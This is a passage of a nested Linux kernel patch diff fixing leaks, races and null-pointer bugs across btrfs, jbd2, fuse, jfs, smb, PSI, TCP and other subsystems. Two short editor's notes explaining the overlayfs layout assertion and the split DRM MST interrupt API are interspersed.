+@@ -613,10 +613,10 @@ static int imxfb_activate_var(struct fb_var_screeninfo *var, struct fb_info *inf
+ 	if (var->hsync_len < 1    || var->hsync_len > 64)
+ 		printk(KERN_ERR "%s: invalid hsync_len %d\n",
+ 			info->fix.id, var->hsync_len);
+-	if (var->left_margin > 255)
++	if (var->left_margin < 3  || var->left_margin > 255)
+ 		printk(KERN_ERR "%s: invalid left_margin %d\n",
+ 			info->fix.id, var->left_margin);
+-	if (var->right_margin > 255)
++	if (var->right_margin < 1 || var->right_margin > 255)
+ 		printk(KERN_ERR "%s: invalid right_margin %d\n",
+ 			info->fix.id, var->right_margin);
+ 	if (var->yres < 1 || var->yres > ymax_mask)
+@@ -1043,7 +1043,6 @@ failed_cmap:
+ failed_map:
+ failed_ioremap:
+ failed_getclock:
+-	release_mem_region(res->start, resource_size(res));
+ failed_of_parse:
+ 	kfree(info->pseudo_palette);
+ failed_init:
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 30b264eb9d209..d93e8735ab1f9 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1894,6 +1894,7 @@ static int exclude_super_stripes(struct btrfs_block_group *cache)
+ 
+ 		/* Shouldn't have super stripes in sequential zones */
+ 		if (zoned && nr) {
++			kfree(logical);
+ 			btrfs_err(fs_info,
+ 			"zoned: block group %llu must not contain super block",
+ 				  cache->start);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index c5583fc2a5855..3c48273cd7a5a 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -4913,9 +4913,6 @@ again:
+ 		ret = -ENOMEM;
+ 		goto out;
+ 	}
+-	ret = set_page_extent_mapped(page);
+-	if (ret < 0)
+-		goto out_unlock;
+ 
+ 	if (!PageUptodate(page)) {
+ 		ret = btrfs_read_folio(NULL, page_folio(page));
+@@ -4930,6 +4927,17 @@ again:
+ 			goto out_unlock;
+ 		}
+ 	}
++
++	/*
++	 * We unlock the page after the io is completed and then re-lock it
++	 * above.  release_folio() could have come in between that and cleared
++	 * PagePrivate(), but left the page in the mapping.  Set the page mapped
++	 * here to make sure it's properly set for the subpage stuff.
++	 */
++	ret = set_page_extent_mapped(page);
++	if (ret < 0)
++		goto out_unlock;
++
+ 	wait_on_page_writeback(page);
+ 
+ 	lock_extent(io_tree, block_start, block_end, &cached_state);
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index 04ca0a4075b6c..cacdb2c5d1528 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -4410,4 +4410,5 @@ void btrfs_qgroup_destroy_extent_records(struct btrfs_transaction *trans)
+ 		ulist_free(entry->old_roots);
+ 		kfree(entry);
+ 	}
++	*root = RB_ROOT;
+ }
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 099af8ba6fe54..2e0832d70406c 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -4092,14 +4092,6 @@ static int alloc_profile_is_valid(u64 flags, int extended)
+ 	return has_single_bit_set(flags);
+ }
+ 
+-static inline int balance_need_close(struct btrfs_fs_info *fs_info)
+-{
+-	/* cancel requested || normal exit path */
+-	return atomic_read(&fs_info->balance_cancel_req) ||
+-		(atomic_read(&fs_info->balance_pause_req) == 0 &&
+-		 atomic_read(&fs_info->balance_cancel_req) == 0);
+-}
+-
+ /*
+  * Validate target profile against allowed profiles and return true if it's OK.
+  * Otherwise print the error message and return false.
+@@ -4289,6 +4281,7 @@ int btrfs_balance(struct btrfs_fs_info *fs_info,
+ 	u64 num_devices;
+ 	unsigned seq;
+ 	bool reducing_redundancy;
++	bool paused = false;
+ 	int i;
+ 
+ 	if (btrfs_fs_closing(fs_info) ||
+@@ -4419,6 +4412,7 @@ int btrfs_balance(struct btrfs_fs_info *fs_info,
+ 	if (ret == -ECANCELED && atomic_read(&fs_info->balance_pause_req)) {
+ 		btrfs_info(fs_info, "balance: paused");
+ 		btrfs_exclop_balance(fs_info, BTRFS_EXCLOP_BALANCE_PAUSED);
++		paused = true;
+ 	}
+ 	/*
+ 	 * Balance can be canceled by:
+@@ -4447,8 +4441,8 @@ int btrfs_balance(struct btrfs_fs_info *fs_info,
+ 		btrfs_update_ioctl_balance_args(fs_info, bargs);
+ 	}
+ 
+-	if ((ret && ret != -ECANCELED && ret != -ENOSPC) ||
+-	    balance_need_close(fs_info)) {
++	/* We didn't pause, we can clean everything up. */
++	if (!paused) {
+ 		reset_balance_state(fs_info);
+ 		btrfs_exclop_finish(fs_info);
+ 	}
+@@ -6601,11 +6595,13 @@ static int __btrfs_map_block(struct btrfs_fs_info *fs_info,
+ 		if (patch_the_first_stripe_for_dev_replace) {
+ 			smap->dev = dev_replace->tgtdev;
+ 			smap->physical = physical_to_patch_in_first_stripe;
+-			*mirror_num_ret = map->num_stripes + 1;
++			if (mirror_num_ret)
++				*mirror_num_ret = map->num_stripes + 1;
+ 		} else {
+ 			set_io_stripe(smap, map, stripe_index, stripe_offset,
+ 				      stripe_nr);
+-			*mirror_num_ret = mirror_num;
++			if (mirror_num_ret)
++				*mirror_num_ret = mirror_num;
+ 		}
+ 		*bioc_ret = NULL;
+ 		ret = 0;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 51d642a95bd29..eaed9fd2f890c 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1732,6 +1732,20 @@ static int ext4_xattr_set_entry(struct ext4_xattr_info *i,
+ 		memmove(here, (void *)here + size,
+ 			(void *)last - (void *)here + sizeof(__u32));
+ 		memset(last, 0, size);
++
++		/*
++		 * Update i_inline_off - moved ibody region might contain
++		 * system.data attribute.  Handling a failure here won't
++		 * cause other complications for setting an xattr.
++		 */
++		if (!is_block && ext4_has_inline_data(inode)) {
++			ret = ext4_find_inline_data_nolock(inode);
++			if (ret) {
++				ext4_warning_inode(inode,
++					"unable to update i_inline_off");
++				goto out;
++			}
++		}
+ 	} else if (s->not_found) {
+ 		/* Insert new name. */
+ 		size_t size = EXT4_XATTR_LEN(name_len);
+diff --git a/fs/fuse/dir.c b/fs/fuse/dir.c
+index 904673a4f6902..5e408e7ec4c6b 100644
+--- a/fs/fuse/dir.c
++++ b/fs/fuse/dir.c
+@@ -258,7 +258,7 @@ static int fuse_dentry_revalidate(struct dentry *entry, unsigned int flags)
+ 			spin_unlock(&fi->lock);
+ 		}
+ 		kfree(forget);
+-		if (ret == -ENOMEM)
++		if (ret == -ENOMEM || ret == -EINTR)
+ 			goto out;
+ 		if (ret || fuse_invalid_attr(&outarg.attr) ||
+ 		    fuse_stale_inode(inode, outarg.generation, &outarg.attr))
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index 6b3beda16c1ba..bc3c3e76c646d 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -1127,7 +1127,10 @@ static void process_init_reply(struct fuse_mount *fm, struct fuse_args *args,
+ 		process_init_limits(fc, arg);
+ 
+ 		if (arg->minor >= 6) {
+-			u64 flags = arg->flags | (u64) arg->flags2 << 32;
++			u64 flags = arg->flags;
++
++			if (flags & FUSE_INIT_EXT)
++				flags |= (u64) arg->flags2 << 32;
+ 
+ 			ra_pages = arg->max_readahead / PAGE_SIZE;
+ 			if (flags & FUSE_ASYNC_READ)
+diff --git a/fs/fuse/ioctl.c b/fs/fuse/ioctl.c
+index 8ba1545e01f95..5a6c715b9a70c 100644
+--- a/fs/fuse/ioctl.c
++++ b/fs/fuse/ioctl.c
+@@ -9,14 +9,23 @@
+ #include <linux/compat.h>
+ #include <linux/fileattr.h>
+ 
+-static ssize_t fuse_send_ioctl(struct fuse_mount *fm, struct fuse_args *args)
++static ssize_t fuse_send_ioctl(struct fuse_mount *fm, struct fuse_args *args,
++			       struct fuse_ioctl_out *outarg)
+ {
+-	ssize_t ret = fuse_simple_request(fm, args);
++	ssize_t ret;
++
++	args->out_args[0].size = sizeof(*outarg);
++	args->out_args[0].value = outarg;
++
++	ret = fuse_simple_request(fm, args);
+ 
+ 	/* Translate ENOSYS, which shouldn't be returned from fs */
+ 	if (ret == -ENOSYS)
+ 		ret = -ENOTTY;
+ 
++	if (ret >= 0 && outarg->result == -ENOSYS)
++		outarg->result = -ENOTTY;
++
+ 	return ret;
+ }
+ 
+@@ -264,13 +273,11 @@ long fuse_do_ioctl(struct file *file, unsigned int cmd, unsigned long arg,
+ 	}
+ 
+ 	ap.args.out_numargs = 2;
+-	ap.args.out_args[0].size = sizeof(outarg);
+-	ap.args.out_args[0].value = &outarg;
+ 	ap.args.out_args[1].size = out_size;
+ 	ap.args.out_pages = true;
+ 	ap.args.out_argvar = true;
+ 
+-	transferred = fuse_send_ioctl(fm, &ap.args);
++	transferred = fuse_send_ioctl(fm, &ap.args, &outarg);
+ 	err = transferred;
+ 	if (transferred < 0)
+ 		goto out;
+@@ -399,12 +406,10 @@ static int fuse_priv_ioctl(struct inode *inode, struct fuse_file *ff,
+ 	args.in_args[1].size = inarg.in_size;
+ 	args.in_args[1].value = ptr;
+ 	args.out_numargs = 2;
+-	args.out_args[0].size = sizeof(outarg);
+-	args.out_args[0].value = &outarg;
+ 	args.out_args[1].size = inarg.out_size;
+ 	args.out_args[1].value = ptr;
+ 
+-	err = fuse_send_ioctl(fm, &args);
++	err = fuse_send_ioctl(fm, &args, &outarg);
+ 	if (!err) {
+ 		if (outarg.result < 0)
+ 			err = outarg.result;
+diff --git a/fs/jbd2/checkpoint.c b/fs/jbd2/checkpoint.c
+index 51bd38da21cdd..25e3c20eb19f6 100644
+--- a/fs/jbd2/checkpoint.c
++++ b/fs/jbd2/checkpoint.c
+@@ -57,28 +57,6 @@ static inline void __buffer_unlink(struct journal_head *jh)
+ 	}
+ }
+ 
+-/*
+- * Move a buffer from the checkpoint list to the checkpoint io list
+- *
+- * Called with j_list_lock held
+- */
+-static inline void __buffer_relink_io(struct journal_head *jh)
+-{
+-	transaction_t *transaction = jh->b_cp_transaction;
+-
+-	__buffer_unlink_first(jh);
+-
+-	if (!transaction->t_checkpoint_io_list) {
+-		jh->b_cpnext = jh->b_cpprev = jh;
+-	} else {
+-		jh->b_cpnext = transaction->t_checkpoint_io_list;
+-		jh->b_cpprev = transaction->t_checkpoint_io_list->b_cpprev;
+-		jh->b_cpprev->b_cpnext = jh;
+-		jh->b_cpnext->b_cpprev = jh;
+-	}
+-	transaction->t_checkpoint_io_list = jh;
+-}
+-
+ /*
+  * Check a checkpoint buffer could be release or not.
+  *
+@@ -183,6 +161,7 @@ __flush_batch(journal_t *journal, int *batch_count)
+ 		struct buffer_head *bh = journal->j_chkpt_bhs[i];
+ 		BUFFER_TRACE(bh, "brelse");
+ 		__brelse(bh);
++		journal->j_chkpt_bhs[i] = NULL;
+ 	}
+ 	*batch_count = 0;
+ }
+@@ -242,6 +221,11 @@ restart:
+ 		jh = transaction->t_checkpoint_list;
+ 		bh = jh2bh(jh);
+ 
++		/*
++		 * The buffer may be writing back, or flushing out in the
++		 * last couple of cycles, or re-adding into a new transaction,
++		 * need to check it again until it's unlocked.
++		 */
+ 		if (buffer_locked(bh)) {
+ 			get_bh(bh);
+ 			spin_unlock(&journal->j_list_lock);
+@@ -287,28 +271,32 @@ restart:
+ 		}
+ 		if (!buffer_dirty(bh)) {
+ 			BUFFER_TRACE(bh, "remove from checkpoint");
+-			if (__jbd2_journal_remove_checkpoint(jh))
+-				/* The transaction was released; we're done */
++			/*
++			 * If the transaction was released or the checkpoint
++			 * list was empty, we're done.
++			 */
++			if (__jbd2_journal_remove_checkpoint(jh) ||
++			    !transaction->t_checkpoint_list)
+ 				goto out;
+-			continue;
++		} else {
++			/*
++			 * We are about to write the buffer, it could be
++			 * raced by some other transaction shrink or buffer
++			 * re-log logic once we release the j_list_lock,
++			 * leave it on the checkpoint list and check status
++			 * again to make sure it's clean.
++			 */
++			BUFFER_TRACE(bh, "queue");
++			get_bh(bh);
++			J_ASSERT_BH(bh, !buffer_jwrite(bh));
++			journal->j_chkpt_bhs[batch_count++] = bh;
++			transaction->t_chp_stats.cs_written++;
++			transaction->t_checkpoint_list = jh->b_cpnext;
+ 		}
+-		/*
+-		 * Important: we are about to write the buffer, and
+-		 * possibly block, while still holding the journal
+-		 * lock.  We cannot afford to let the transaction
+-		 * logic start messing around with this buffer before
+-		 * we write it to disk, as that would break
+-		 * recoverability.
+-		 */
+-		BUFFER_TRACE(bh, "queue");
+-		get_bh(bh);
+-		J_ASSERT_BH(bh, !buffer_jwrite(bh));
+-		journal->j_chkpt_bhs[batch_count++] = bh;
+-		__buffer_relink_io(jh);
+-		transaction->t_chp_stats.cs_written++;
++
+ 		if ((batch_count == JBD2_NR_BATCH) ||
+-		    need_resched() ||
+-		    spin_needbreak(&journal->j_list_lock))
++		    need_resched() || spin_needbreak(&journal->j_list_lock) ||
++		    jh2bh(transaction->t_checkpoint_list) == journal->j_chkpt_bhs[0])
+ 			goto unlock_and_flush;
+ 	}
+ 
+@@ -322,38 +310,6 @@ restart:
+ 			goto restart;
+ 	}
+ 
+-	/*
+-	 * Now we issued all of the transaction's buffers, let's deal
+-	 * with the buffers that are out for I/O.
+-	 */
+-restart2:
+-	/* Did somebody clean up the transaction in the meanwhile? */
+-	if (journal->j_checkpoint_transactions != transaction ||
+-	    transaction->t_tid != this_tid)
+-		goto out;
+-
+-	while (transaction->t_checkpoint_io_list) {
+-		jh = transaction->t_checkpoint_io_list;
+-		bh = jh2bh(jh);
+-		if (buffer_locked(bh)) {
+-			get_bh(bh);
+-			spin_unlock(&journal->j_list_lock);
+-			wait_on_buffer(bh);
+-			/* the journal_head may have gone by now */
+-			BUFFER_TRACE(bh, "brelse");
+-			__brelse(bh);
+-			spin_lock(&journal->j_list_lock);
+-			goto restart2;
+-		}
+-
+-		/*
+-		 * Now in whatever state the buffer currently is, we
+-		 * know that it has been written out and so we can
+-		 * drop it from the list
+-		 */
+-		if (__jbd2_journal_remove_checkpoint(jh))
+-			break;
+-	}
+ out:
+ 	spin_unlock(&journal->j_list_lock);
+ 	result = jbd2_cleanup_journal_tail(journal);
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index da6a2bc6bf022..bd4ef43b02033 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -1959,6 +1959,9 @@ dbAllocDmapLev(struct bmap * bmp,
+ 	if (dbFindLeaf((dmtree_t *) & dp->tree, l2nb, &leafidx))
+ 		return -ENOSPC;
+ 
++	if (leafidx < 0)
++		return -EIO;
++
+ 	/* determine the block number within the file system corresponding
+ 	 * to the leaf at which free space was found.
+ 	 */
+diff --git a/fs/jfs/jfs_txnmgr.c b/fs/jfs/jfs_txnmgr.c
+index ffd4feece0785..ce4b4760fcb1d 100644
+--- a/fs/jfs/jfs_txnmgr.c
++++ b/fs/jfs/jfs_txnmgr.c
+@@ -354,6 +354,11 @@ tid_t txBegin(struct super_block *sb, int flag)
+ 	jfs_info("txBegin: flag = 0x%x", flag);
+ 	log = JFS_SBI(sb)->log;
+ 
++	if (!log) {
++		jfs_error(sb, "read-only filesystem\n");
++		return 0;
++	}
++
+ 	TXN_LOCK();
+ 
+ 	INCREMENT(TxStat.txBegin);
+diff --git a/fs/jfs/namei.c b/fs/jfs/namei.c
+index 4fbbf88435e69..b3a0fe0649c49 100644
+--- a/fs/jfs/namei.c
++++ b/fs/jfs/namei.c
+@@ -799,6 +799,11 @@ static int jfs_link(struct dentry *old_dentry,
+ 	if (rc)
+ 		goto out;
+ 
++	if (isReadOnly(ip)) {
++		jfs_error(ip->i_sb, "read-only filesystem\n");
++		return -EROFS;
++	}
++
+ 	tid = txBegin(ip->i_sb, 0);
+ 
+ 	mutex_lock_nested(&JFS_IP(dir)->commit_mutex, COMMIT_MUTEX_PARENT);
+diff --git a/fs/overlayfs/ovl_entry.h b/fs/overlayfs/ovl_entry.h
+index e1af8f6606984..a479680a5ccd8 100644
+--- a/fs/overlayfs/ovl_entry.h
++++ b/fs/overlayfs/ovl_entry.h
+@@ -32,6 +32,7 @@ struct ovl_sb {
+ };
+ 
+ struct ovl_layer {
++	/* ovl_free_fs() relies on @mnt being the first member! */
+ 	struct vfsmount *mnt;
+ 	/* Trap in ovl inode cache */
+ 	struct inode *trap;
+@@ -42,6 +43,14 @@ struct ovl_layer {
+ 	int fsid;
+ };
+ 
++/*
++ * ovl_free_fs() relies on @mnt being the first member when unmounting
++ * the private mounts created for each layer. Let's check both the
++ * offset and type.
++ */
++static_assert(offsetof(struct ovl_layer, mnt) == 0);
++static_assert(__same_type(typeof_member(struct ovl_layer, mnt), struct vfsmount *));
++
+ struct ovl_path {
+ 	const struct ovl_layer *layer;
+ 	struct dentry *dentry;
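[Editor's sketch] The ovl_entry.h hunk turns an implicit layout contract — ovl_free_fs() evidently treats an array of ovl_layer as an array of vfsmount pointers — into a compile-time check. The same trick applies anywhere code depends on a member sitting at a fixed offset; a minimal standalone version:

#include <assert.h>	/* static_assert (C11) */
#include <stddef.h>	/* offsetof */

struct layer {
	struct mount *mnt;	/* consumers cast &layer to &mnt */
	int fsid;
};

/* Fail the build, not the runtime, if the contract is broken. */
static_assert(offsetof(struct layer, mnt) == 0,
	      "mnt must stay the first member of struct layer");

int main(void) { return 0; }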
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index f27faf5db5544..46dca88d89c36 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -555,7 +555,7 @@ restart:
+ 			continue;
+ 		/* Wait for dquot users */
+ 		if (atomic_read(&dquot->dq_count)) {
+-			dqgrab(dquot);
++			atomic_inc(&dquot->dq_count);
+ 			spin_unlock(&dq_list_lock);
+ 			/*
+ 			 * Once dqput() wakes us up, we know it's time to free
+@@ -2420,7 +2420,8 @@ int dquot_load_quota_sb(struct super_block *sb, int type, int format_id,
+ 
+ 	error = add_dquot_ref(sb, type);
+ 	if (error)
+-		dquot_disable(sb, type, flags);
++		dquot_disable(sb, type,
++			      DQUOT_USAGE_ENABLED | DQUOT_LIMITS_ENABLED);
+ 
+ 	return error;
+ out_fmt:
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 935fe198a4baf..cbe08948baf4a 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -59,7 +59,7 @@ extern bool disable_legacy_dialects;
+ #define TLINK_IDLE_EXPIRE	(600 * HZ)
+ 
+ /* Drop the connection to not overload the server */
+-#define NUM_STATUS_IO_TIMEOUT   5
++#define MAX_STATUS_IO_TIMEOUT   5
+ 
+ struct mount_ctx {
+ 	struct cifs_sb_info *cifs_sb;
+@@ -1162,6 +1162,7 @@ cifs_demultiplex_thread(void *p)
+ 	struct mid_q_entry *mids[MAX_COMPOUND];
+ 	char *bufs[MAX_COMPOUND];
+ 	unsigned int noreclaim_flag, num_io_timeout = 0;
++	bool pending_reconnect = false;
+ 
+ 	noreclaim_flag = memalloc_noreclaim_save();
+ 	cifs_dbg(FYI, "Demultiplex PID: %d\n", task_pid_nr(current));
+@@ -1201,6 +1202,8 @@ cifs_demultiplex_thread(void *p)
+ 		cifs_dbg(FYI, "RFC1002 header 0x%x\n", pdu_length);
+ 		if (!is_smb_response(server, buf[0]))
+ 			continue;
++
++		pending_reconnect = false;
+ next_pdu:
+ 		server->pdu_size = pdu_length;
+ 
+@@ -1258,10 +1261,13 @@ next_pdu:
+ 		if (server->ops->is_status_io_timeout &&
+ 		    server->ops->is_status_io_timeout(buf)) {
+ 			num_io_timeout++;
+-			if (num_io_timeout > NUM_STATUS_IO_TIMEOUT) {
+-				cifs_reconnect(server, false);
++			if (num_io_timeout > MAX_STATUS_IO_TIMEOUT) {
++				cifs_server_dbg(VFS,
++						"Number of request timeouts exceeded %d. Reconnecting",
++						MAX_STATUS_IO_TIMEOUT);
++
++				pending_reconnect = true;
+ 				num_io_timeout = 0;
+-				continue;
+ 			}
+ 		}
+ 
+@@ -1308,6 +1314,11 @@ next_pdu:
+ 			buf = server->smallbuf;
+ 			goto next_pdu;
+ 		}
++
++		/* do this reconnect at the very end after processing all MIDs */
++		if (pending_reconnect)
++			cifs_reconnect(server, true);
++
+ 	} /* end while !EXITING */
+ 
+ 	/* buffer usually freed in free_mid - need to free it here on exit */
+diff --git a/fs/udf/unicode.c b/fs/udf/unicode.c
+index 622569007b530..2142cbd1dde24 100644
+--- a/fs/udf/unicode.c
++++ b/fs/udf/unicode.c
+@@ -247,7 +247,7 @@ static int udf_name_from_CS0(struct super_block *sb,
+ 	}
+ 
+ 	if (translate) {
+-		if (str_o_len <= 2 && str_o[0] == '.' &&
++		if (str_o_len > 0 && str_o_len <= 2 && str_o[0] == '.' &&
+ 		    (str_o_len == 1 || str_o[1] == '.'))
+ 			needsCRC = 1;
+ 		if (needsCRC) {
+diff --git a/include/drm/display/drm_dp_mst_helper.h b/include/drm/display/drm_dp_mst_helper.h
+index 32c764fb9cb56..40e855c8407cf 100644
+--- a/include/drm/display/drm_dp_mst_helper.h
++++ b/include/drm/display/drm_dp_mst_helper.h
+@@ -815,8 +815,11 @@ void drm_dp_mst_topology_mgr_destroy(struct drm_dp_mst_topology_mgr *mgr);
+ bool drm_dp_read_mst_cap(struct drm_dp_aux *aux, const u8 dpcd[DP_RECEIVER_CAP_SIZE]);
+ int drm_dp_mst_topology_mgr_set_mst(struct drm_dp_mst_topology_mgr *mgr, bool mst_state);
+ 
+-int drm_dp_mst_hpd_irq(struct drm_dp_mst_topology_mgr *mgr, u8 *esi, bool *handled);
+-
++int drm_dp_mst_hpd_irq_handle_event(struct drm_dp_mst_topology_mgr *mgr,
++				    const u8 *esi,
++				    u8 *ack,
++				    bool *handled);
++void drm_dp_mst_hpd_irq_send_new_request(struct drm_dp_mst_topology_mgr *mgr);
+ 
+ int
+ drm_dp_mst_detect_port(struct drm_connector *connector,
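[Editor's sketch] The header change splits the old drm_dp_mst_hpd_irq() into an event-handling half and a request-sending half, so a display driver can acknowledge the serviced ESI bits over DPCD in between and avoid racing a follow-up sideband message against an unacknowledged event. A hedged sketch of the likely calling sequence — the ack buffer size and DPCD write are driver-specific details elided here:

#include <drm/display/drm_dp_mst_helper.h>

static void example_service_esi(struct drm_dp_mst_topology_mgr *mgr,
				const u8 *esi)
{
	u8 ack[8] = {};
	bool handled = false;

	drm_dp_mst_hpd_irq_handle_event(mgr, esi, ack, &handled);
	if (!handled)
		return;

	/* Driver-specific: write 'ack' back to the sink's ESI block so
	 * the serviced IRQ bits are cleared before anything new is sent.
	 */

	/* Only now let the MST core transmit any queued sideband request. */
	drm_dp_mst_hpd_irq_send_new_request(mgr);
}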
+diff --git a/include/linux/psi.h b/include/linux/psi.h
+index b029a847def1e..e0745873e3f26 100644
+--- a/include/linux/psi.h
++++ b/include/linux/psi.h
+@@ -23,8 +23,9 @@ void psi_memstall_enter(unsigned long *flags);
+ void psi_memstall_leave(unsigned long *flags);
+ 
+ int psi_show(struct seq_file *s, struct psi_group *group, enum psi_res res);
+-struct psi_trigger *psi_trigger_create(struct psi_group *group,
+-			char *buf, enum psi_res res);
++struct psi_trigger *psi_trigger_create(struct psi_group *group, char *buf,
++				       enum psi_res res, struct file *file,
++				       struct kernfs_open_file *of);
+ void psi_trigger_destroy(struct psi_trigger *t);
+ 
+ __poll_t psi_trigger_poll(void **trigger_ptr, struct file *file,
+diff --git a/include/linux/psi_types.h b/include/linux/psi_types.h
+index 14a1ebb74e11f..f1fd3a8044e0e 100644
+--- a/include/linux/psi_types.h
++++ b/include/linux/psi_types.h
+@@ -72,6 +72,9 @@ enum psi_states {
+ /* Use one bit in the state mask to track TSK_ONCPU */
+ #define PSI_ONCPU	(1 << NR_PSI_STATES)
+ 
++/* Flag whether to re-arm avgs_work, see details in get_recent_times() */
++#define PSI_STATE_RESCHEDULE	(1 << (NR_PSI_STATES + 1))
++
+ enum psi_aggregators {
+ 	PSI_AVGS = 0,
+ 	PSI_POLL,
+@@ -134,6 +137,9 @@ struct psi_trigger {
+ 	/* Wait queue for polling */
+ 	wait_queue_head_t event_wait;
+ 
++	/* Kernfs file for cgroup triggers */
++	struct kernfs_open_file *of;
++
+ 	/* Pending event flag */
+ 	int event;
+ 
+@@ -148,6 +154,9 @@ struct psi_trigger {
+ 
+ 	/* Deferred event(s) from previous ratelimit window */
+ 	bool pending_event;
++
++	/* Trigger type - PSI_AVGS for unprivileged, PSI_POLL for RT */
++	enum psi_aggregators aggregator;
+ };
+ 
+ struct psi_group {
+@@ -168,30 +177,34 @@ struct psi_group {
+ 	/* Aggregator work control */
+ 	struct delayed_work avgs_work;
+ 
++	/* Unprivileged triggers against N*PSI_FREQ windows */
++	struct list_head avg_triggers;
++	u32 avg_nr_triggers[NR_PSI_STATES - 1];
++
+ 	/* Total stall times and sampled pressure averages */
+ 	u64 total[NR_PSI_AGGREGATORS][NR_PSI_STATES - 1];
+ 	unsigned long avg[NR_PSI_STATES - 1][3];
+ 
+-	/* Monitor work control */
+-	struct task_struct __rcu *poll_task;
+-	struct timer_list poll_timer;
+-	wait_queue_head_t poll_wait;
+-	atomic_t poll_wakeup;
+-	atomic_t poll_scheduled;
++	/* Monitor RT polling work control */
++	struct task_struct __rcu *rtpoll_task;
++	struct timer_list rtpoll_timer;
++	wait_queue_head_t rtpoll_wait;
++	atomic_t rtpoll_wakeup;
++	atomic_t rtpoll_scheduled;
+ 
+ 	/* Protects data used by the monitor */
+-	struct mutex trigger_lock;
+-
+-	/* Configured polling triggers */
+-	struct list_head triggers;
+-	u32 nr_triggers[NR_PSI_STATES - 1];
+-	u32 poll_states;
+-	u64 poll_min_period;
+-
+-	/* Total stall times at the start of monitor activation */
+-	u64 polling_total[NR_PSI_STATES - 1];
+-	u64 polling_next_update;
+-	u64 polling_until;
++	struct mutex rtpoll_trigger_lock;
++
++	/* Configured RT polling triggers */
++	struct list_head rtpoll_triggers;
++	u32 rtpoll_nr_triggers[NR_PSI_STATES - 1];
++	u32 rtpoll_states;
++	u64 rtpoll_min_period;
++
++	/* Total stall times at the start of RT polling monitor activation */
++	u64 rtpoll_total[NR_PSI_STATES - 1];
++	u64 rtpoll_next_update;
++	u64 rtpoll_until;
+ };
+ 
+ #else /* CONFIG_PSI */
+diff --git a/include/linux/tcp.h b/include/linux/tcp.h
+index 41b1da621a458..9cd289ad3f5b5 100644
+--- a/include/linux/tcp.h
++++ b/include/linux/tcp.h
+@@ -510,7 +510,7 @@ static inline void fastopen_queue_tune(struct sock *sk, int backlog)
+ 	struct request_sock_queue *queue = &inet_csk(sk)->icsk_accept_queue;
+ 	int somaxconn = READ_ONCE(sock_net(sk)->core.sysctl_somaxconn);
+ 
+-	queue->fastopenq.max_qlen = min_t(unsigned int, backlog, somaxconn);
++	WRITE_ONCE(queue->fastopenq.max_qlen, min_t(unsigned int, backlog, somaxconn));
+ }
+ 
+ static inline void tcp_move_syn(struct tcp_sock *tp,
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 84c5ce57eab69..ddbcbf9ccb2ce 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -807,6 +807,7 @@ struct hci_conn_params {
+ 
+ 	struct hci_conn *conn;
+ 	bool explicit_connect;
++	/* Accessed without hdev->lock: */
+ 	hci_conn_flags_t flags;
+ 	u8  privacy_mode;
+ };
+@@ -1536,7 +1537,11 @@ struct hci_conn_params *hci_conn_params_add(struct hci_dev *hdev,
+ 					    bdaddr_t *addr, u8 addr_type);
+ void hci_conn_params_del(struct hci_dev *hdev, bdaddr_t *addr, u8 addr_type);
+ void hci_conn_params_clear_disabled(struct hci_dev *hdev);
++void hci_conn_params_free(struct hci_conn_params *param);
+ 
++void hci_pend_le_list_del_init(struct hci_conn_params *param);
++void hci_pend_le_list_add(struct hci_conn_params *param,
++			  struct list_head *list);
+ struct hci_conn_params *hci_pend_le_action_lookup(struct list_head *list,
+ 						  bdaddr_t *addr,
+ 						  u8 addr_type);
+diff --git a/include/net/ip.h b/include/net/ip.h
+index acec504c469a0..83a1a9bc3ceb1 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -282,7 +282,7 @@ void ip_send_unicast_reply(struct sock *sk, struct sk_buff *skb,
+ 			   const struct ip_options *sopt,
+ 			   __be32 daddr, __be32 saddr,
+ 			   const struct ip_reply_arg *arg,
+-			   unsigned int len, u64 transmit_time);
++			   unsigned int len, u64 transmit_time, u32 txhash);
+ 
+ #define IP_INC_STATS(net, field)	SNMP_INC_STATS64((net)->mib.ip_statistics, field)
+ #define __IP_INC_STATS(net, field)	__SNMP_INC_STATS64((net)->mib.ip_statistics, field)
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 5eedd476a38d7..e9c8f88f47696 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -1511,25 +1511,38 @@ void tcp_leave_memory_pressure(struct sock *sk);
+ static inline int keepalive_intvl_when(const struct tcp_sock *tp)
+ {
+ 	struct net *net = sock_net((struct sock *)tp);
++	int val;
+ 
+-	return tp->keepalive_intvl ? :
+-		READ_ONCE(net->ipv4.sysctl_tcp_keepalive_intvl);
++	/* Paired with WRITE_ONCE() in tcp_sock_set_keepintvl()
++	 * and do_tcp_setsockopt().
++	 */
++	val = READ_ONCE(tp->keepalive_intvl);
++
++	return val ? : READ_ONCE(net->ipv4.sysctl_tcp_keepalive_intvl);
+ }
+ 
+ static inline int keepalive_time_when(const struct tcp_sock *tp)
+ {
+ 	struct net *net = sock_net((struct sock *)tp);
++	int val;
+ 
+-	return tp->keepalive_time ? :
